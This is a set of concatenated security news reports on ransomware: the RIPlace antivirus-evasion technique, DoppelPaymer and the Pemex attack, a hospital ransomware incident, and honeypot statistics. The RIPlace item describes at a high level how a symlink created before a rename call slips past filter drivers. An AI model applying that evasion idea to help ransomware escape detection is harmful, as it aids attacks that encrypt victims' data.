A recently discovered technique allows ransomware to encrypt files on Windows-based systems without being detected by existing anti-ransomware products, Nyotron security researchers warn.
Dubbed RIPlace, the technique allows malware to bypass defenses using the legacy file system “rename” operation, and the security researchers say it is effective even against systems that are timely patched and run modern antivirus solutions.
RIPlace, the researchers say, can be used to alter files on any computers running Windows XP or newer versions of Microsoft’s operating system.
In a detailed report covering the findings (PDF), the researchers note that most ransomware operates by opening and reading the original file, encrypting content in memory, and then destroying the original file by writing encrypted content to it/saving the encrypted file and then erasing the original/or by saving the encrypted file and then leveraging Rename to replace it.
When a Rename request is called (IRP_MJ_SET_INFORMATION with FileInformationClass set to FileRenameInformation), the filter driver gets a callback.
What the researchers discovered was that, if DefineDosDevice (a legacy function that creates a symlink), is called before Rename, one could pass an arbitrary name as the device name, along with the original file path as the target to point on.
The issue, they explain, is that the callback function filter driver “fails to parse the destination path when using the common routine FltGetDestinationFileNameInformation.” Although an error is returned when passing a DosDevice path, the Rename call succeeds.
“Using this technique, it is possible to maliciously encrypt files and bypass antivirus/anti-ransomware products that do not properly handle IRP_MJ_SET_INFORMATION callback. We believe that malicious actors may abuse this technique in order to bypass security products that rely on FltGetDestinationFileNameInformation routine as well as avoid any recording of such activity by EDR products,” the researchers explain.
The researchers discovered the technique in spring 2019 and have been in contact with Microsoft, security vendors, and law enforcement and regulatory authorities. Unfortunately, they say only a handful of security vendors have acknowledged a fix, despite dozens being impacted.
Nyotron published two videos demonstrating how RIPlace can bypass Symantec Endpoint Protection (SEP) and Microsoft Defender Antivirus (Defender AV) and also released a free tool that allows anyone to test their system and security products against RIPlace evasion technique.
The DopplePaymer ransomware spreads via existing Domain Admin credentials, not exploits targeting the BlueKeep vulnerability, Microsoft says.
The malware, which security researchers believe to have been involved in the recent attack on Mexican state-owned oil company Petróleos Mexicanos (Pemex), has been making the rounds since June 2019, with some earlier samples dated as far back as April 2019.
Initially detailed in July this year, DopplePaymer is said to be a forked version of BitPaymer, likely the work of some members of the TA505 threat group (the hackers behind Dridex and Locky) who decided to leave the cybercrime gang and start their own illegal operation.
In a new blog post, Dan West and Mary Jensen, both senior security program managers at Microsoft’s Security Response Center, explain that while DopplePaymer represents a real threat to organizations, information on its spreading method is misleading.
Specifically, the tech company says that information regarding DopplePaymer spreading across internal networks via Microsoft Teams and the Remote Desktop Protocol (RDP) vulnerability BlueKeep is incorrect.
“Our security research teams have investigated and found no evidence to support these claims. In our investigations we found that the malware relies on remote human operators using existing Domain Admin credentials to spread across an enterprise network,” Microsoft’s researchers explain.
The company recommends that security administrators enforce a good credential hygiene, apply the principle of least privilege, and implement network segmentation to keep their environments protected.
These best practices, Microsoft notes, can help prevent not only DopplePaymer attacks, but also other malware from compromising networks, disabling security tools, and leveraging privileged credentials to steal or destroy data.
Microsoft, which has already included protection from DopplePaymer and other malware in Windows Defender, says it will continue to enhance protections as new emerging threats are identified.
“Globally, ransomware continues to be one of the most popular revenue channels for cybercriminals as part of a post-compromise attack,” Microsoft warns.
Attackers, the company says, typically use social engineering to compromise enterprises. The practice involves tricking an employee to visit a malicious site or to open downloaded or emailed documents that drop malware onto their computers.
Mexican state-owned oil company Petróleos Mexicanos (Pemex) on Sunday suffered a ransomware attack that took down parts of its network.
The attack, the company claims, was quickly neutralized and only impacted less than 5% of the computers in its network.
In an attempt to stop any rumors related to the suffered attack, the company also pointed out that it is operating normally and that production, supply, and inventories of fuel were not impacted.
Pemex also notes that its internal network, “like all major national and international government and financial companies and institutions,” is frequently targeted in cyber-attacks.
The company did not provide specific information on the incident, but security researchers revealed on Twitter that the DoppelPaymer ransomware was involved.
The attackers apparently demanded a 565 BTC ($4.9 million) ransom to be paid, while also claiming that they gathered sensitive data from the Pemex network. The miscreants also threaten to share the allegedly stolen information publicly if the company does not pay the ransom.
Initially detailed in July this year, DoppelPaymer is a forked version of BitPaymer, a piece of ransomware built by TA505, the threat actor behind the infamous Dridex and Locky ransomware. DoppelPaymer, researchers say, is likely the work of members of TA505 that left the group to start their own operation.
DoppelPaymer, security researcher Vitali Kremez points out, is often dropped via an infection chain that starts with Emotet installing Dridex.
According to BleepingComputer, Pemex apparently did not try to contact the attackers regarding a possible payment.
– Hackers infected Washington-based Grays Harbor Community Hospital and Harbor Medical Group with ransomware and demanded a payment of $1 million to unlock patient files, according to a report from the Daily World.
The report sheds light on the EHR downtime the provider put into place after experiencing persistent issues with its EHR systems in June. Both the hospital and HMG’s clinics were impacted by the issues with its MEDITECH EHR. However, officials did not explain the cause.
According to the latest, the hackers infected the computer systems with ransomware nearly two months ago when an employee clicked on a malicious link contained in a phishing email. The cyberattack began on a weekend when Grays Harbor IT staff was limited.
During the initial days, staff treated it as an IT issue and officials said servers were turned off the Monday after the attack to contain the infection. However, the ransomware had rapidly spread within the first days of the attack.
Grays Harbor clinics were hit harder by the attack, as the hospital’s older software prevented the ransomware from properly installing on the main system. The ransomware was more effective at the clinics, where medical records, prescriptions, and other functions are still down.
Patient records are still available at the hospital, while the clinics are still operating on paper. Officials stressed that patient care was not impacted, with surgeries, emergency care, and routine appointments continuing as scheduled.
But some appointments were delayed, and patients were asked to bring their prescriptions and other medical histories with them at the time of care. Additionally, Grays Harbor experienced a five-day period where payments could not be processed, which officials said was a large issue for the “cash-strapped” operation.
The money was not lost, but the timing and cash-flow was problematic. Grays Harbor does have cyber insurance with a $1 million cap, which officials are hoping will cover the damage. Officials said the insurance company caused of the lack of transparency, as they were in charge of the response and investigation.
The situation is still ongoing, and officials have contacted the FBI to alert them to the security incident. The report did not explain whether the hospital paid the ransom. What’s more, about 85,000 patients are being notified that their data was compromised during the event. Although officials said there’s currently no evidence of disclosure.
Grays Harbor did have traditional anti-virus and backups in place before the ransomware attack, but even the backups were infected. Officials said they have not yet determined whether the missing records are permanently gone.
Officials are concerned about the ongoing attack, as just a year ago the hospital’s future was still in limbo given “crippling debt.” Ransomware causes some of the largest devastation of cyberattacks, with recent reports showing ransomware payments have increase 184 percent during the second quarter of 2019. The average downtime lasts nearly 10 days.
Grays Harbor is just the latest provider to experience a long period of downtime due to ransomware. After falling victim to two ransomware attacks in the course of two months and experiencing nearly eight weeks of downtime, Kentucky-based Park DuValle Community Health Center paid hackers $70,000 to unlock its records.
It’s why so many ransomware victims choose to give into hackers and pay the ransom – with the sum demanded in the biggest attacks amounting to hundreds of thousands of dollars, usually to be paid in Bitcoin or other cryptocurrency.
Cybersecurity researchers at F-Secure set up honeypots – decoy servers facing the internet designed to be appealing to hackers – to track cyberattacks and cyber-criminal activity during the first half of 2019.
The Attack Landscape H1 2019report details what they found and it shows that, when it comes to ransomware, brute force is the main means of infection vector, accounting for 31% of attempts to deliver file-encrypting attacks.
Brute force attacks – also known as credential-stuffing attacks – see hackers attempt to compromise servers and endpoints by inputting as many passwords as possible, usually with the aid of bots, just to see if any of them work against the target. The attacks are successful due to the number of systems that use default credentials or extremely common passwords.
“Plain and simply, brute-force attacks are the primary choice for hackers because it works, we’re seeing that there are an abundance of accounts that have way too many insecure and weak passwords – making it too easy for hackers to bypass them,” Jarno Niemela, principal researcher at F-Secure, told ZDNet.
Remote Desktop Protocol (RDP) attacks can also be conducted in this way, with attackers attempting to guess passwords in order to remotely gain control of internet-facing endpoints. It’s also possible for hackers to use underground forums to buy the usernames and passwords required to attack previously compromised endpoints.
But despite the rise in brute force attacks, spam and phishing remains a highly common attack vector for ransomware: almost a quarter of the ransomware attacks targeting F-Secure honeypots looked to deliver ransomware via email.
All it can take for an attack to potentially compromise an entire network is for one user to download a malicious attachment – especially if the network is running unpatched software or doesn’t have anti-virus. GandCrab ransomware was commonly distributed by email during the first half of this year.
Other methods attackers are using in attempts to deliver ransomware include compromised firmware, fake software, malvertising and specially constructed exploit kits – toolboxes containing various exploits for attackers to take advantage of – with each of these accounting for around 10% of attempted attacks.
With the report finding that all forms of cyberattack are on the rise, it might sound like a cause for concern for organisations of all kinda and in all sectors. However, researchers note that, with a few simple techniques, organisations can help themselves to remain secure.